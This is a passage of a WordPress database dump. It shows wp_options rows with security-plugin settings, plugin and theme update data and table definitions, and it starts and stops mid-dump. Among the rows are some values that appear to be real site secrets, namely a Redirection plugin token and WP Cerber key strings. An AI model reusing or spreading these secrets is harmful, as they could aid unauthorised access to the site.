'),(57553,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";s:0:\"\";s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(57554,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(57555,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(57556,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(57557,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"03:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(57558,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(57559,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";s:0:\"\";s:13:\"master_swshow\";s:0:\"\";s:14:\"master_at_site\";s:0:\"\";s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(57560,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(57561,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1631796687;}','no'),(57562,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(57572,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(57573,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(57574,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(57575,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(57576,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(57582,'wp_page_for_privacy_policy','0','yes'),(57583,'show_comments_cookies_opt_in','1','yes'),(57584,'admin_email_lifespan','0','yes'),(57585,'disallowed_keys','','no'),(57586,'comment_previously_approved','1','yes'),(57587,'auto_plugin_theme_update_emails','a:0:{}','no'),(57588,'auto_update_core_dev','enabled','yes'),(57589,'auto_update_core_minor','enabled','yes'),(57590,'auto_update_core_major','unset','yes'),(57591,'finished_updating_comment_type','1','yes'),(57592,'db_upgraded','','yes'),(57600,'recovery_keys','a:0:{}','yes'),(57601,'https_detection_errors','a:0:{}','yes'),(57651,'wordfence_syncAttackDataAttempts','0','no'),(57652,'wordfence_syncingAttackData','0','no'),(57653,'wordfence_lastSyncAttackData','1629614260','no'),(57718,'_transient_health-check-site-status-result','{\"good\":12,\"recommended\":6,\"critical\":1}','yes'),(76495,'can_compress_scripts','0','no'),(77982,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(77990,'wp_force_deactivated_plugins','a:0:{}','yes'),(78003,'redirection_options','a:31:{s:7:\"support\";b:0;s:5:\"token\";s:32:\"7c71b4520ee2d3f3ae1daf82c159740c\";s:12:\"monitor_post\";i:0;s:13:\"monitor_types\";a:0:{}s:19:\"associated_redirect\";s:0:\"\";s:11:\"auto_target\";s:0:\"\";s:15:\"expire_redirect\";i:7;s:10:\"expire_404\";i:7;s:12:\"log_external\";b:0;s:10:\"log_header\";b:0;s:10:\"track_hits\";b:1;s:7:\"modules\";a:0:{}s:10:\"newsletter\";b:0;s:14:\"redirect_cache\";i:1;s:10:\"ip_logging\";i:1;s:13:\"last_group_id\";i:1;s:8:\"rest_api\";i:0;s:5:\"https\";b:0;s:7:\"headers\";a:0:{}s:8:\"database\";s:3:\"4.2\";s:8:\"relocate\";s:0:\"\";s:16:\"preferred_domain\";s:0:\"\";s:7:\"aliases\";a:0:{}s:10:\"permalinks\";a:0:{}s:9:\"cache_key\";i:0;s:13:\"plugin_update\";s:6:\"prompt\";s:13:\"update_notice\";i:0;s:10:\"flag_query\";s:5:\"exact\";s:9:\"flag_case\";b:0;s:13:\"flag_trailing\";b:0;s:10:\"flag_regex\";b:0;}','yes'),(78004,'cerber-groove','LNW0y8Z5xYs9dClK','no'),(78005,'cerber-groove-x','a:2:{i:0;s:25:\"GOgy1wKhsLd6TUzNZ2kQXojfC\";i:1;s:25:\"FfohlKwdDpjxXLeBtbUvA6kur\";}','no'),(78014,'_cerber_notify_new','a:4:{i:0;s:5:\"8.9.3\";i:1;s:5:\"8.9.5\";i:2;s:5:\"8.9.6\";i:3;s:3:\"9.0\";}','no'),(78027,'theme_mods_property-builder','a:2:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:12:\"primary-menu\";i:2;}}','yes'),(78029,'theme_switch_menu_locations','a:1:{s:7:\"primary\";i:2;}','yes'),(78034,'_transient_is_multi_author','0','yes'),(78038,'zotya_hp_options','s:112:\"a:4:{s:14:\"zotya_hp_admin\";i:1;s:14:\"zotya_hp_login\";i:1;s:13:\"zotya_hp_site\";i:0;s:17:\"zotya_hp_fix_auth\";i:0;}\";','yes'),(79005,'_cerber_report','a:2:{i:0;i:1675070431;i:1;b:0;}','no'),(153903,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:5:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.9.5\";s:7:\"version\";s:5:\"5.9.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1675203571;s:15:\"version_checked\";s:5:\"5.8.6\";s:12:\"translations\";a:0:{}}','no'),(164291,'_site_transient_timeout_cerber_daily_1','1675306333','no'),(164292,'_site_transient_cerber_daily_1','a:2:{i:0;i:1675133527;i:1;i:1675133533;}','no'),(165537,'_site_transient_timeout_cerber_hourly_1','1675213323','no'),(165538,'_site_transient_cerber_hourly_1','a:2:{i:0;i:1675206123;i:1;i:1675206123;}','no'),(166308,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675242057','no'),(166309,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(167250,'_site_transient_timeout_cerber_hourly_2','1675214134','no'),(167251,'_site_transient_cerber_hourly_2','a:2:{i:0;i:1675206934;i:1;i:1675206934;}','no'),(167352,'_site_transient_timeout_theme_roots','1675205372','no'),(167353,'_site_transient_theme_roots','a:2:{s:16:\"construction-hub\";s:7:\"/themes\";s:16:\"property-builder\";s:7:\"/themes\";}','no'),(167354,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675203572;s:7:\"checked\";a:2:{s:16:\"construction-hub\";s:5:\"0.7.5\";s:16:\"property-builder\";s:3:\"0.1\";}s:8:\"response\";a:2:{s:16:\"construction-hub\";a:6:{s:5:\"theme\";s:16:\"construction-hub\";s:11:\"new_version\";s:3:\"0.9\";s:3:\"url\";s:46:\"https://wordpress.org/themes/construction-hub/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/construction-hub.0.9.zip\";s:8:\"requires\";s:3:\"5.0\";s:12:\"requires_php\";s:3:\"7.2\";}s:16:\"property-builder\";a:6:{s:5:\"theme\";s:16:\"property-builder\";s:11:\"new_version\";s:5:\"0.3.3\";s:3:\"url\";s:46:\"https://wordpress.org/themes/property-builder/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/theme/property-builder.0.3.3.zip\";s:8:\"requires\";s:3:\"5.0\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(167355,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675203573;s:8:\"response\";a:9:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.0.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.0.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.2\";}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.70\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.70.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2837281\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2837281\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.3\";}s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"5.1.4\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.5.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-256x256.png?rev=2798307\";s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=2798307\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=2798307\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=2798307\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:39:\"disable-gutenberg/disable-gutenberg.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/disable-gutenberg\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:6:\"plugin\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:11:\"new_version\";s:5:\"2.8.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/disable-gutenberg/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/disable-gutenberg.2.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-256x256.png?rev=1925990\";s:2:\"1x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-128x128.png?rev=1925990\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:6:\"5.6.20\";}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.10.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.10.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=2622511\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=2597493\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=2597493\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"7.0\";}s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:36:\"w.org/plugins/zotya-htaccess-protect\";s:4:\"slug\";s:22:\"zotya-htaccess-protect\";s:6:\"plugin\";s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";s:11:\"new_version\";s:5:\"0.7.0\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/zotya-htaccess-protect/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/zotya-htaccess-protect.0.7.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/zotya-htaccess-protect/assets/icon-256x256.png?rev=2314302\";s:2:\"1x\";s:75:\"https://ps.w.org/zotya-htaccess-protect/assets/icon-128x128.png?rev=2314302\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/zotya-htaccess-protect/assets/banner-1544x500.png?rev=2314302\";s:2:\"1x\";s:77:\"https://ps.w.org/zotya-htaccess-protect/assets/banner-772x250.png?rev=2314302\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"5.9.5\";s:12:\"requires_php\";s:3:\"5.6\";}s:27:\"redirection/redirection.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/redirection\";s:4:\"slug\";s:11:\"redirection\";s:6:\"plugin\";s:27:\"redirection/redirection.php\";s:11:\"new_version\";s:5:\"5.3.9\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/redirection/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/redirection.5.3.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/redirection/assets/icon-256x256.jpg?rev=983639\";s:2:\"1x\";s:63:\"https://ps.w.org/redirection/assets/icon-128x128.jpg?rev=983640\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/redirection/assets/banner-1544x500.jpg?rev=983641\";s:2:\"1x\";s:65:\"https://ps.w.org/redirection/assets/banner-772x250.jpg?rev=983642\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:25:\"sucuri-scanner/sucuri.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/sucuri-scanner\";s:4:\"slug\";s:14:\"sucuri-scanner\";s:6:\"plugin\";s:25:\"sucuri-scanner/sucuri.php\";s:11:\"new_version\";s:6:\"1.8.36\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/sucuri-scanner/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/sucuri-scanner.1.8.36.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/sucuri-scanner/assets/icon-256x256.png?rev=2498042\";s:2:\"1x\";s:67:\"https://ps.w.org/sucuri-scanner/assets/icon-128x128.png?rev=2498042\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/sucuri-scanner/assets/banner-772x250.png?rev=2498042\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";b:0;}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:5:\"7.8.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wordfence.7.8.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.3\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:0:{}s:7:\"checked\";a:10:{s:19:\"akismet/akismet.php\";s:6:\"4.1.12\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.47\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:5:\"4.4.8\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:3:\"2.5\";s:23:\"elementor/elementor.php\";s:5:\"3.3.1\";s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";s:5:\"0.6.0\";s:27:\"redirection/redirection.php\";s:5:\"5.1.3\";s:25:\"sucuri-scanner/sucuri.php\";s:6:\"1.8.28\";s:23:\"wordfence/wordfence.php\";s:5:\"7.5.5\";s:23:\"wp-cerber/wp-cerber.php\";s:5:\"8.8.5\";}}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_pluginSL_spam_captcha`
--

DROP TABLE IF EXISTS `wp_pluginSL_spam_captcha`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pluginSL_spam_captcha` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_comment` mediumint(9) NOT NULL,
  `status` varchar(10) DEFAULT 'ok',
  `new_status` varchar(10) DEFAULT 'ok',
  `author` text DEFAULT NULL,
  `content` text DEFAULT NULL,
  `captcha_info` text DEFAULT NULL,
  `date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  UNIQUE KEY `id_post` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_pluginSL_spam_captcha`
--

LOCK TABLES `wp_pluginSL_spam_captcha` WRITE;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=1324 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
